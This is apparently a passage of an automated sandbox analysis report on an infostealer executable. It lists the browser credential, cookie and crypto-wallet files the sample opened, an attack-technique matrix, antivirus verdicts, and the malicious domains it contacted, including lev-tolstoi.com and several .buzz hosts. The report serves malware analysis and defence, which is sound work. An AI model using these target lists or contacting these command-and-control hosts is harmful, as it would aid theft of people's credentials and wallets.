              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: Yara matchFile source: Process Memory Space: oe9KS7ZHUc.exe PID: 7292, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: oe9KS7ZHUc.exe PID: 7292, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              Process Injection
              44
              Virtualization/Sandbox Evasion
              1
              OS Credential Dumping
              1
              Query Registry
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              1
              Process Injection
              LSASS Memory851
              Security Software Discovery
              Remote Desktop Protocol31
              Data from Local System
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell
              Logon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account Manager44
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information
              NTDS2
              Process Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials223
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              oe9KS7ZHUc.exe54%VirustotalBrowse
              oe9KS7ZHUc.exe53%ReversingLabsWin32.Infostealer.Tinba
              oe9KS7ZHUc.exe100%AviraTR/Crypt.TPM.Gen
              oe9KS7ZHUc.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://lev-tolstoi.com/a100%Avira URL Cloudmalware
              https://lev-tolstoi.com/apil100%Avira URL Cloudmalware
              https://lev-tolstoi.com/er100%Avira URL Cloudmalware
              https://lev-tolstoi.com/E=100%Avira URL Cloudmalware
              https://lev-tolstoi.com/te100%Avira URL Cloudmalware
              https://lev-tolstoi.com/apis100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              steamcommunity.com
              23.55.153.106
              truefalse
                high
                lev-tolstoi.com
                104.21.66.86
                truefalse
                  high
                  cashfuzysao.buzz
                  unknown
                  unknownfalse
                    high
                    scentniej.buzz
                    unknown
                    unknownfalse
                      high
                      inherineau.buzz
                      unknown
                      unknownfalse
                        high
                        prisonyfork.buzz
                        unknown
                        unknownfalse
                          high
                          rebuildeso.buzz
                          unknown
                          unknownfalse
                            high
                            appliacnesot.buzz
                            unknown
                            unknownfalse
                              high
                              hummskitnj.buzz
                              unknown
                              unknownfalse
                                high
                                mindhandru.buzz
                                unknown
                                unknownfalse
                                  high
                                  screwamusresz.buzz
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    scentniej.buzzfalse
                                      high
                                      https://steamcommunity.com/profiles/76561199724331900false
                                        high
                                        rebuildeso.buzzfalse
                                          high
                                          appliacnesot.buzzfalse
                                            high
                                            screwamusresz.buzzfalse
                                              high
                                              cashfuzysao.buzzfalse
                                                high
                                                inherineau.buzzfalse
                                                  high
                                                  https://lev-tolstoi.com/apifalse
                                                    high
                                                    hummskitnj.buzzfalse
                                                      high
                                                      mindhandru.buzzfalse
                                                        high
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngoe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://duckduckgo.com/chrome_newtaboe9KS7ZHUc.exe, 00000000.00000003.1783584612.0000000005CED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://player.vimeo.comoe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://duckduckgo.com/ac/?q=oe9KS7ZHUc.exe, 00000000.00000003.1783584612.0000000005CED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampoe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://steamcommunity.com/?subsection=broadcastsoe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.oe9KS7ZHUc.exe, 00000000.00000003.1859053217.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://store.steampowered.com/subscriber_agreement/oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.gstatic.cn/recaptcha/oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.valvesoftware.com/legal.htmoe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=enoe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.youtube.comoe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.google.comoe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYioe9KS7ZHUc.exe, 00000000.00000003.1859053217.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackoe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737835610.000000000143C000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1782732973.0000000001478000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engloe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisoe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCoe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://s.ytimg.com;oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRioe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737835610.000000000143C000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&oe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://community.fastly.steamstatic.com/oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1782732973.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://steam.tv/oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://lev-tolstoi.com/aoe9KS7ZHUc.exe, 00000000.00000003.1810056487.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1809375524.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1809487885.0000000005CAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94oe9KS7ZHUc.exe, 00000000.00000003.1859053217.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enoe9KS7ZHUc.exe, 00000000.00000003.1760037666.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737159252.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://steamcommunity.com/poe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
